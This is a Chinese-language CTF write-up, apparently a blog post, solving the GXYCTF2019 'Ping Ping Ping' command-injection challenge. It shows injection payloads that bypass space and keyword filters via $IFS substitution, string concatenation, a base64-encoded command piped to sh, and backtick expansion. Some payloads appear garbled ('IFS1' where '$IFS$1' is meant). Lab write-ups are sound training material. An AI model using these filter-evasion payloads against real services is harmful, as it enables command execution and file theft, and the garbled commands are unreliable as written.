[GXYCTF2019]Ping Ping Ping1

打开靶机

结合题目名称,考虑是命令注入,试试ls

结果应该就在flag.php。尝试构造命令注入载荷。 cat flag.php

可以看到过滤了空格,用 IFS1替换空格

还过滤了flag,我们用字符拼接的方式看能否绕过,a=g;catIFS1fla$a.php。注意这里用分号间隔,所以不能用管道符连接了。

可以看到flag了。这里有个坑,这段是纯php代码,所以在页面上没有显示出来,要注意观察界面的源码。

其实可以先看一下index.php

基本上可以看到过滤了哪些内容。所以还可以用base64编码绕过过滤

echoIFS1Y2F0IGZsYWcucGhw|base64IFS1-d|sh

既然ls能把flag找出来, 则还可以利用内联的方式获取flag catIFS1`ls`

放一个命令注入的介绍:命令注入以及常见绕过方式_命令注入如何绕过空色-CSDN博客

相关推荐
一名优秀的码农9 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp9 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp9 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人9 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp9 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0079 天前
渗透测试_漏洞利用
网络安全
啥都想学点9 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ9 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏9 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk9 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全